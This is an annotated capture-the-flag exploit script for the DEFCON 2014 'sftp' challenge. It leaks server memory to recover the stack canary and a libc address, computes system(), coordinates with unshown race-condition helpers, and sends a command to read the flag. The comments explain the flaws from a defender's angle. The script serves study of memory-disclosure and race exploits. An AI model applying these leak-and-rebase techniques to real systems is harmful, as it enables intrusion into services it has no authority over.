DEFCON 2014 Writeup sftp
# DEFCON 2014 "sftp" write-up script (Python 2 syntax: print statements,
# raw_input, str-typed socket data).
#
# Flow, as far as the visible code shows: authenticate with a fixed password,
# drive a KILL / STOR OLD / RETR command sequence twice, pausing each time so
# that an external helper (cause_race1.py, cause_race2.py -- not on this
# page) can be started; after the first pause a 1280-byte response is read
# and three 32-bit values are pulled out of it at fixed offsets (a stack
# cookie, a stack address, and a return address into __libc_start_main),
# i.e. the server leaks process memory. From the libc leak the address of
# system() is derived with hard-coded offsets, and after the second pause a
# shell command is sent. The value `system_addr` is computed and printed but
# never sent by this script, so whatever uses it must happen in the race
# helper -- cannot be confirmed from here.
#
# Defensive reading: the interesting defects are (1) the server returning
# uninitialised/out-of-bounds memory to the client, which defeats both the
# stack canary and ASLR by disclosure rather than by guessing, and (2) a
# timing window in the KILL/STOR/RETR handling that the helper scripts widen.
# A leak like this is visible on the wire as non-text bytes in a response to
# a text-protocol command.
import time
import socket
from struct import pack, unpack

# Plain TCP to the challenge host; port 115 is the one the service listened on.
p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p.connect(('sftp_bf28442aa4ab1a4089ddca16729b29ac.2014.shallweplayaga.me', 115))
#p.connect(('localhost', 115))   # local test target, left in by the author
print p.recv(4096)   # banner
# Hard-coded challenge password; every response is printed for debugging.
p.send("PASS defcon2014\n")
print p.recv(4096)
# First KILL / STOR OLD / RETR round. The "STOR OLD a\n\n" carries an extra
# newline, so the second line is presumably consumed as (empty) file content
# -- verify against the server.
p.send("KILL a\n")
print p.recv(4096)
p.send("STOR OLD a\n\n")
print p.recv(4096)
p.send("RETR a\n")
print p.recv(4096)
# Block here until the operator has started the first race helper; nothing
# in this file launches it.
raw_input() # wait launching cause_race1.py
p.send("SEND\n")
# Collect at least 1280 bytes of response. NOTE(review): if the peer closes
# the connection early, recv() returns "" and this loop never terminates
# because len(s) stops growing.
s = ""
while len(s) < 1280:
    s += p.recv(4096)
print [s]   # repr of the raw bytes, so the leaked memory is readable
# Fixed-offset reads from the leaked buffer, all little-endian 32-bit.
# The offsets are specific to the challenge binary as deployed.
cookie = unpack("<I", s[0x39c:0x3a0])[0]   # stack protector canary
stack = unpack("<I", s[0x30:0x34])[0]      # a stack address (used by the helper, presumably)
__libc_start_main_ret = unpack("<I", s[1276:1280])[0]   # return address into __libc_start_main
# Rebase from the leaked libc return address to system(); both constants are
# tied to the exact libc build on the target and are not general.
system_addr = __libc_start_main_ret - 0x19a83 + 0x00403b0
print "stack:", hex(stack)
print "cookie:", hex(cookie)
print "system:", hex(system_addr)
# Second KILL / STOR OLD / RETR round, same sequence as the first.
p.send("KILL a\n")
print p.recv(4096)
p.send("STOR OLD a\n\n")
print p.recv(4096)
p.send("RETR a\n")
print p.recv(4096)
# Second manual pause for the second race helper.
raw_input() # wait launching cause_race2.py
p.send("SEND\n")
# The command string is sent as ordinary protocol data; the script assumes
# the server is by now executing what it reads (via the helper's work).
p.send("cat /home/sftp/flag\n")
# Echo whatever comes back until the process is killed; recv() returning ""
# on close makes this a busy loop printing empty strings.
while 1:
    print p.recv(4096)